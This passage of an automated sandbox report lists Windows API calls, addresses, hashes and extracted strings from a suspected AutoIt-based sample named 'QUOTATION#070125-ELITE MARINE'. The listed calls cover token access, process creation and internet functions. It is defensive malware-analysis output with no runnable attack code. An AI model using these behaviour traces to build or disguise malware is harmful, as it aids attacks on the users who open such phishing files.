                                                                            • GetCurrentThreadId.KERNEL32 ref: 00650ABE
                                                                            • GetCurrentProcessId.KERNEL32 ref: 00650AC7
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00650AD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                            • String ID:
                                                                            • API String ID: 2933794660-0
                                                                            • Opcode ID: f2dc06ad299e536abca2d990f6a526fbbc638bc62d396b048f8c6158e9e7e2ef
                                                                            • Instruction ID: a0d39bb79aec4a5db659cc2ef659eeb4a79bab54893854fbb1534b966ab3d0b1
                                                                            • Opcode Fuzzy Hash: f2dc06ad299e536abca2d990f6a526fbbc638bc62d396b048f8c6158e9e7e2ef
                                                                            • Instruction Fuzzy Hash: EDF05F71C10209EBCB00DBB4D949AAEBBF8FF18215F518896E416E7150D774AB059F51
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 006498CC
                                                                            • SetTextColor.GDI32(?,?), ref: 006498D6
                                                                            • SetBkMode.GDI32(?,00000001), ref: 006498E9
                                                                            • GetStockObject.GDI32(00000005), ref: 006498F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Color$ModeObjectStockText
                                                                            • String ID:
                                                                            • API String ID: 4037423528-0
                                                                            • Opcode ID: 32c31bd0ff0218bb944a626d3d0aa7146f2a1d3e3f8bdb531cee5cdc2fd64487
                                                                            • Instruction ID: 9f4d5d1cec12fd21395fc47a49b9b08e1d9189fdbb0e1cb07e701608c1798c34
                                                                            • Opcode Fuzzy Hash: 32c31bd0ff0218bb944a626d3d0aa7146f2a1d3e3f8bdb531cee5cdc2fd64487
                                                                            • Instruction Fuzzy Hash: 74E06D31644280AEDB215B79BC09FE93F62AB12336F188319F6FE981E1C77186509B21
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 00691634
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,006911D9), ref: 0069163B
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006911D9), ref: 00691648
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,006911D9), ref: 0069164F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 2e8aaac753eb0215046c1e0f4d5aee37ead6dfc0f4fb8bb64ad997bd560f24f2
                                                                            • Instruction ID: bd75643a4c15d5ed1c2335197df5b4d98a3657aa0613bf31e88f03d3dc9b8539
                                                                            • Opcode Fuzzy Hash: 2e8aaac753eb0215046c1e0f4d5aee37ead6dfc0f4fb8bb64ad997bd560f24f2
                                                                            • Instruction Fuzzy Hash: 7CE08671A01211DBDB201FA0AD0DFA63B7EBF457A1F184808F249CE080D6388441C750
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 0068D858
                                                                            • GetDC.USER32(00000000), ref: 0068D862
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0068D882
                                                                            • ReleaseDC.USER32(?), ref: 0068D8A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 4b1706524ba489d650c426806cd7005f23330787204b2a50c636b76303e855b7
                                                                            • Instruction ID: 9c05ea049313c0094858111e0f0e9f1ec45230009216d19dfa5fc2d4ad241ea3
                                                                            • Opcode Fuzzy Hash: 4b1706524ba489d650c426806cd7005f23330787204b2a50c636b76303e855b7
                                                                            • Instruction Fuzzy Hash: 6FE09AB5900205EFCB41AFA1D90CA7DBBB7FB48321F149459F84AE7250C7399942AF50
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 0068D86C
                                                                            • GetDC.USER32(00000000), ref: 0068D876
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0068D882
                                                                            • ReleaseDC.USER32(?), ref: 0068D8A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: dbbfca5c97af3cdd59e0fcd02f9b48c1cd2da5682c88efd96902169ea9ccae61
                                                                            • Instruction ID: 83b6d7a6835927dffafc81d7f80e94a327d252fe2a75ad470fc927a9de88fecc
                                                                            • Opcode Fuzzy Hash: dbbfca5c97af3cdd59e0fcd02f9b48c1cd2da5682c88efd96902169ea9ccae61
                                                                            • Instruction Fuzzy Hash: 14E092B5D00204EFCB51AFA1D90CA6DBBB6BB48321F14A449F94AE7250CB399902AF50
                                                                            APIs
                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 006A94E5
                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 006A9585
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FileName$OpenSave
                                                                            • String ID: X
                                                                            • API String ID: 3924019920-3081909835
                                                                            • Opcode ID: 7effe98f4cd421fa5150e393d96aa6ccf8b008d30418b333ffb9c23411afe9a4
                                                                            • Instruction ID: b2a3cd4d99902eec7db1e2c249be0c27da1848d12c7fcccc93e3afe255ac2019
                                                                            • Opcode Fuzzy Hash: 7effe98f4cd421fa5150e393d96aa6ccf8b008d30418b333ffb9c23411afe9a4
                                                                            • Instruction Fuzzy Hash: F9E181319083509FD764EF24C481A6AB7E2BF85314F14896DF8899B3A2DB31DD05CFA6
                                                                            APIs
                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 006A4ED4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Connection
                                                                            • String ID: *$LPT
                                                                            • API String ID: 1722446006-3443410124
                                                                            • Opcode ID: 2e5a2911a4c78f1cda68dfd77a1594fdd7c0894ccdedbf6594dc9a8e5d374b7e
                                                                            • Instruction ID: 5c6f96432855e89d14a26d228edf7db0fb5c64c53b77264598931d1767d3567a
                                                                            • Opcode Fuzzy Hash: 2e5a2911a4c78f1cda68dfd77a1594fdd7c0894ccdedbf6594dc9a8e5d374b7e
                                                                            • Instruction Fuzzy Hash: 32914F75A002049FCB14EF58C884EAABBF2BF85314F158099E40A9F362DB75ED85CF91
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(0068569E,00000000,?,006CCC08,00000000,?,00000000,00000000), ref: 006B783B
                                                                            • CharUpperBuffW.USER32(0068569E,00000000,?,006CCC08,?,00000000,00000000), ref: 006B78DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: <so
                                                                            • API String ID: 3964851224-187667226
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: JOc
                                                                            • API String ID: 0-555135532
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #
                                                                            • API String ID: 0-1885708031
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 0064F2A2
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0064F2BB
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            APIs
                                                                            • EncodePointer.KERNEL32(00000000,00000000,00000000,?), ref: 00653F6E
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: EncodePointer
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 2118026453-2084237596
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 006C3621
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006C365C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 006C461F
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006C4634
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            APIs
                                                                              • Part of subcall function 006B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,006B3077,?,?), ref: 006B3378
                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006B307A
                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 006B3106
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 2496851823-2422070025
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006C327C
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006C3287
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            APIs
                                                                              • Part of subcall function 0063600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0063604C
                                                                              • Part of subcall function 0063600E: GetStockObject.GDI32(00000011), ref: 00636060
                                                                              • Part of subcall function 0063600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063606A
                                                                            • GetWindowRect.USER32(00000000,?), ref: 006C377A
                                                                            • GetSysColor.USER32(00000012), ref: 006C3794
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006ACD7D
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006ACDA6
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 006C34AB
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006C34BA
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00691D4C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00691C46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00691CC8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00691DD3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00703018,0070305C), ref: 006C81BF
                                                                            • CloseHandle.KERNEL32 ref: 006C81D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: \0p
                                                                            • API String ID: 3712363035-363088137
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00690B23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 2030045667-4017498283
                                                                            APIs
                                                                              • Part of subcall function 0064F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00650D71,?,?,?,0063100A), ref: 0064F7CE
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0063100A), ref: 00650D75
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0063100A), ref: 00650D84
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00650D7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                            • API String ID: 55579361-631824599
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 006A302F
                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 006A3044
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Temp$FileNamePath
                                                                            • String ID: aut
                                                                            • API String ID: 3285503233-3010740371
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime
                                                                            • String ID: %.3d$X64
                                                                            • API String ID: 481472006-1077770165
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006C236C
                                                                            • PostMessageW.USER32(00000000), ref: 006C2373
                                                                              • Part of subcall function 0069E97B: Sleep.KERNEL32 ref: 0069E9F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006C232C
                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006C233F
                                                                              • Part of subcall function 0069E97B: Sleep.KERNEL32 ref: 0069E9F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
